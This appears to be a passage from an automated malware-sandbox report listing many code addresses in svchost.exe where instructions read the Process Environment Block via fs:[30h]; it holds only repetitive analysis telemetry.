Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038EC188 mov eax, dword ptr fs:[00000030h]	7_2_038EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038D4180 mov eax, dword ptr fs:[00000030h]	7_2_038D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038D4180 mov eax, dword ptr fs:[00000030h]	7_2_038D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B019F mov eax, dword ptr fs:[00000030h]	7_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B019F mov eax, dword ptr fs:[00000030h]	7_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B019F mov eax, dword ptr fs:[00000030h]	7_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B019F mov eax, dword ptr fs:[00000030h]	7_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0382A197 mov eax, dword ptr fs:[00000030h]	7_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0382A197 mov eax, dword ptr fs:[00000030h]	7_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0382A197 mov eax, dword ptr fs:[00000030h]	7_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038F61C3 mov eax, dword ptr fs:[00000030h]	7_2_038F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038F61C3 mov eax, dword ptr fs:[00000030h]	7_2_038F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	7_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	7_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]	7_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	7_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	7_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_039061E5 mov eax, dword ptr fs:[00000030h]	7_2_039061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038601F8 mov eax, dword ptr fs:[00000030h]	7_2_038601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038DE10E mov eax, dword ptr fs:[00000030h]	7_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038DE10E mov ecx, dword ptr fs:[00000030h]	7_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038DE10E mov eax, dword ptr fs:[00000030h]	7_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038DE10E mov eax, dword ptr fs:[00000030h]	7_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038DE10E mov ecx, dword ptr fs:[00000030h]	7_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038DE10E mov eax, dword ptr fs:[00000030h]	7_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038DE10E mov eax, dword ptr fs:[00000030h]	7_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038DE10E mov ecx, dword ptr fs:[00000030h]	7_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038DE10E mov eax, dword ptr fs:[00000030h]	7_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038DE10E mov ecx, dword ptr fs:[00000030h]	7_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038DA118 mov ecx, dword ptr fs:[00000030h]	7_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038DA118 mov eax, dword ptr fs:[00000030h]	7_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038DA118 mov eax, dword ptr fs:[00000030h]	7_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038DA118 mov eax, dword ptr fs:[00000030h]	7_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038F0115 mov eax, dword ptr fs:[00000030h]	7_2_038F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03860124 mov eax, dword ptr fs:[00000030h]	7_2_03860124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038C4144 mov eax, dword ptr fs:[00000030h]	7_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038C4144 mov eax, dword ptr fs:[00000030h]	7_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038C4144 mov ecx, dword ptr fs:[00000030h]	7_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038C4144 mov eax, dword ptr fs:[00000030h]	7_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038C4144 mov eax, dword ptr fs:[00000030h]	7_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0382C156 mov eax, dword ptr fs:[00000030h]	7_2_0382C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038C8158 mov eax, dword ptr fs:[00000030h]	7_2_038C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03836154 mov eax, dword ptr fs:[00000030h]	7_2_03836154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03836154 mov eax, dword ptr fs:[00000030h]	7_2_03836154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383208A mov eax, dword ptr fs:[00000030h]	7_2_0383208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038C80A8 mov eax, dword ptr fs:[00000030h]	7_2_038C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038F60B8 mov eax, dword ptr fs:[00000030h]	7_2_038F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038F60B8 mov ecx, dword ptr fs:[00000030h]	7_2_038F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B20DE mov eax, dword ptr fs:[00000030h]	7_2_038B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]	7_2_0382A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038380E9 mov eax, dword ptr fs:[00000030h]	7_2_038380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B60E0 mov eax, dword ptr fs:[00000030h]	7_2_038B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0382C0F0 mov eax, dword ptr fs:[00000030h]	7_2_0382C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038720F0 mov ecx, dword ptr fs:[00000030h]	7_2_038720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B4000 mov ecx, dword ptr fs:[00000030h]	7_2_038B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038D2000 mov eax, dword ptr fs:[00000030h]	7_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038D2000 mov eax, dword ptr fs:[00000030h]	7_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038D2000 mov eax, dword ptr fs:[00000030h]	7_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038D2000 mov eax, dword ptr fs:[00000030h]	7_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038D2000 mov eax, dword ptr fs:[00000030h]	7_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038D2000 mov eax, dword ptr fs:[00000030h]	7_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038D2000 mov eax, dword ptr fs:[00000030h]	7_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038D2000 mov eax, dword ptr fs:[00000030h]	7_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0384E016 mov eax, dword ptr fs:[00000030h]	7_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0384E016 mov eax, dword ptr fs:[00000030h]	7_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0384E016 mov eax, dword ptr fs:[00000030h]	7_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0384E016 mov eax, dword ptr fs:[00000030h]	7_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0382A020 mov eax, dword ptr fs:[00000030h]	7_2_0382A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0382C020 mov eax, dword ptr fs:[00000030h]	7_2_0382C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038C6030 mov eax, dword ptr fs:[00000030h]	7_2_038C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03832050 mov eax, dword ptr fs:[00000030h]	7_2_03832050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B6050 mov eax, dword ptr fs:[00000030h]	7_2_038B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0385C073 mov eax, dword ptr fs:[00000030h]	7_2_0385C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038D678E mov eax, dword ptr fs:[00000030h]	7_2_038D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038307AF mov eax, dword ptr fs:[00000030h]	7_2_038307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038E47A0 mov eax, dword ptr fs:[00000030h]	7_2_038E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383C7C0 mov eax, dword ptr fs:[00000030h]	7_2_0383C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B07C3 mov eax, dword ptr fs:[00000030h]	7_2_038B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038527ED mov eax, dword ptr fs:[00000030h]	7_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038527ED mov eax, dword ptr fs:[00000030h]	7_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038527ED mov eax, dword ptr fs:[00000030h]	7_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038BE7E1 mov eax, dword ptr fs:[00000030h]	7_2_038BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038347FB mov eax, dword ptr fs:[00000030h]	7_2_038347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038347FB mov eax, dword ptr fs:[00000030h]	7_2_038347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386C700 mov eax, dword ptr fs:[00000030h]	7_2_0386C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03830710 mov eax, dword ptr fs:[00000030h]	7_2_03830710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03860710 mov eax, dword ptr fs:[00000030h]	7_2_03860710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386C720 mov eax, dword ptr fs:[00000030h]	7_2_0386C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386C720 mov eax, dword ptr fs:[00000030h]	7_2_0386C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386273C mov eax, dword ptr fs:[00000030h]	7_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386273C mov ecx, dword ptr fs:[00000030h]	7_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386273C mov eax, dword ptr fs:[00000030h]	7_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038AC730 mov eax, dword ptr fs:[00000030h]	7_2_038AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386674D mov esi, dword ptr fs:[00000030h]	7_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386674D mov eax, dword ptr fs:[00000030h]	7_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386674D mov eax, dword ptr fs:[00000030h]	7_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03830750 mov eax, dword ptr fs:[00000030h]	7_2_03830750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038BE75D mov eax, dword ptr fs:[00000030h]	7_2_038BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872750 mov eax, dword ptr fs:[00000030h]	7_2_03872750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872750 mov eax, dword ptr fs:[00000030h]	7_2_03872750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B4755 mov eax, dword ptr fs:[00000030h]	7_2_038B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03838770 mov eax, dword ptr fs:[00000030h]	7_2_03838770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03840770 mov eax, dword ptr fs:[00000030h]	7_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03840770 mov eax, dword ptr fs:[00000030h]	7_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03840770 mov eax, dword ptr fs:[00000030h]	7_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03840770 mov eax, dword ptr fs:[00000030h]	7_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03840770 mov eax, dword ptr fs:[00000030h]	7_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03840770 mov eax, dword ptr fs:[00000030h]	7_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03840770 mov eax, dword ptr fs:[00000030h]	7_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03840770 mov eax, dword ptr fs:[00000030h]	7_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03840770 mov eax, dword ptr fs:[00000030h]	7_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03840770 mov eax, dword ptr fs:[00000030h]	7_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03840770 mov eax, dword ptr fs:[00000030h]	7_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03840770 mov eax, dword ptr fs:[00000030h]	7_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03834690 mov eax, dword ptr fs:[00000030h]	7_2_03834690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03834690 mov eax, dword ptr fs:[00000030h]	7_2_03834690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386C6A6 mov eax, dword ptr fs:[00000030h]	7_2_0386C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038666B0 mov eax, dword ptr fs:[00000030h]	7_2_038666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]	7_2_0386A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386A6C7 mov eax, dword ptr fs:[00000030h]	7_2_0386A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	7_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	7_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	7_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	7_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B06F1 mov eax, dword ptr fs:[00000030h]	7_2_038B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B06F1 mov eax, dword ptr fs:[00000030h]	7_2_038B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038AE609 mov eax, dword ptr fs:[00000030h]	7_2_038AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0384260B mov eax, dword ptr fs:[00000030h]	7_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0384260B mov eax, dword ptr fs:[00000030h]	7_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0384260B mov eax, dword ptr fs:[00000030h]	7_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0384260B mov eax, dword ptr fs:[00000030h]	7_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0384260B mov eax, dword ptr fs:[00000030h]	7_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0384260B mov eax, dword ptr fs:[00000030h]	7_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0384260B mov eax, dword ptr fs:[00000030h]	7_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872619 mov eax, dword ptr fs:[00000030h]	7_2_03872619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0384E627 mov eax, dword ptr fs:[00000030h]	7_2_0384E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03866620 mov eax, dword ptr fs:[00000030h]	7_2_03866620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03868620 mov eax, dword ptr fs:[00000030h]	7_2_03868620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383262C mov eax, dword ptr fs:[00000030h]	7_2_0383262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0384C640 mov eax, dword ptr fs:[00000030h]	7_2_0384C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038F866E mov eax, dword ptr fs:[00000030h]	7_2_038F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038F866E mov eax, dword ptr fs:[00000030h]	7_2_038F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386A660 mov eax, dword ptr fs:[00000030h]	7_2_0386A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386A660 mov eax, dword ptr fs:[00000030h]	7_2_0386A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03862674 mov eax, dword ptr fs:[00000030h]	7_2_03862674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03832582 mov eax, dword ptr fs:[00000030h]	7_2_03832582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03832582 mov ecx, dword ptr fs:[00000030h]	7_2_03832582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03864588 mov eax, dword ptr fs:[00000030h]	7_2_03864588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386E59C mov eax, dword ptr fs:[00000030h]	7_2_0386E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B05A7 mov eax, dword ptr fs:[00000030h]	7_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B05A7 mov eax, dword ptr fs:[00000030h]	7_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B05A7 mov eax, dword ptr fs:[00000030h]	7_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038545B1 mov eax, dword ptr fs:[00000030h]	7_2_038545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038545B1 mov eax, dword ptr fs:[00000030h]	7_2_038545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386E5CF mov eax, dword ptr fs:[00000030h]	7_2_0386E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386E5CF mov eax, dword ptr fs:[00000030h]	7_2_0386E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038365D0 mov eax, dword ptr fs:[00000030h]	7_2_038365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386A5D0 mov eax, dword ptr fs:[00000030h]	7_2_0386A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386A5D0 mov eax, dword ptr fs:[00000030h]	7_2_0386A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038325E0 mov eax, dword ptr fs:[00000030h]	7_2_038325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386C5ED mov eax, dword ptr fs:[00000030h]	7_2_0386C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386C5ED mov eax, dword ptr fs:[00000030h]	7_2_0386C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038C6500 mov eax, dword ptr fs:[00000030h]	7_2_038C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03904500 mov eax, dword ptr fs:[00000030h]	7_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03904500 mov eax, dword ptr fs:[00000030h]	7_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03904500 mov eax, dword ptr fs:[00000030h]	7_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03904500 mov eax, dword ptr fs:[00000030h]	7_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03904500 mov eax, dword ptr fs:[00000030h]	7_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03904500 mov eax, dword ptr fs:[00000030h]	7_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03904500 mov eax, dword ptr fs:[00000030h]	7_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03840535 mov eax, dword ptr fs:[00000030h]	7_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03840535 mov eax, dword ptr fs:[00000030h]	7_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03840535 mov eax, dword ptr fs:[00000030h]	7_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03840535 mov eax, dword ptr fs:[00000030h]	7_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03840535 mov eax, dword ptr fs:[00000030h]	7_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03840535 mov eax, dword ptr fs:[00000030h]	7_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0385E53E mov eax, dword ptr fs:[00000030h]	7_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0385E53E mov eax, dword ptr fs:[00000030h]	7_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0385E53E mov eax, dword ptr fs:[00000030h]	7_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0385E53E mov eax, dword ptr fs:[00000030h]	7_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0385E53E mov eax, dword ptr fs:[00000030h]	7_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03838550 mov eax, dword ptr fs:[00000030h]	7_2_03838550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03838550 mov eax, dword ptr fs:[00000030h]	7_2_03838550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386656A mov eax, dword ptr fs:[00000030h]	7_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386656A mov eax, dword ptr fs:[00000030h]	7_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386656A mov eax, dword ptr fs:[00000030h]	7_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038EA49A mov eax, dword ptr fs:[00000030h]	7_2_038EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038364AB mov eax, dword ptr fs:[00000030h]	7_2_038364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038644B0 mov ecx, dword ptr fs:[00000030h]	7_2_038644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038BA4B0 mov eax, dword ptr fs:[00000030h]	7_2_038BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038304E5 mov ecx, dword ptr fs:[00000030h]	7_2_038304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03868402 mov eax, dword ptr fs:[00000030h]	7_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03868402 mov eax, dword ptr fs:[00000030h]	7_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03868402 mov eax, dword ptr fs:[00000030h]	7_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0382E420 mov eax, dword ptr fs:[00000030h]	7_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0382E420 mov eax, dword ptr fs:[00000030h]	7_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0382E420 mov eax, dword ptr fs:[00000030h]	7_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0382C427 mov eax, dword ptr fs:[00000030h]	7_2_0382C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B6420 mov eax, dword ptr fs:[00000030h]	7_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B6420 mov eax, dword ptr fs:[00000030h]	7_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B6420 mov eax, dword ptr fs:[00000030h]	7_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B6420 mov eax, dword ptr fs:[00000030h]	7_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B6420 mov eax, dword ptr fs:[00000030h]	7_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B6420 mov eax, dword ptr fs:[00000030h]	7_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B6420 mov eax, dword ptr fs:[00000030h]	7_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386A430 mov eax, dword ptr fs:[00000030h]	7_2_0386A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386E443 mov eax, dword ptr fs:[00000030h]	7_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386E443 mov eax, dword ptr fs:[00000030h]	7_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386E443 mov eax, dword ptr fs:[00000030h]	7_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386E443 mov eax, dword ptr fs:[00000030h]	7_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386E443 mov eax, dword ptr fs:[00000030h]	7_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386E443 mov eax, dword ptr fs:[00000030h]	7_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386E443 mov eax, dword ptr fs:[00000030h]	7_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386E443 mov eax, dword ptr fs:[00000030h]	7_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038EA456 mov eax, dword ptr fs:[00000030h]	7_2_038EA456
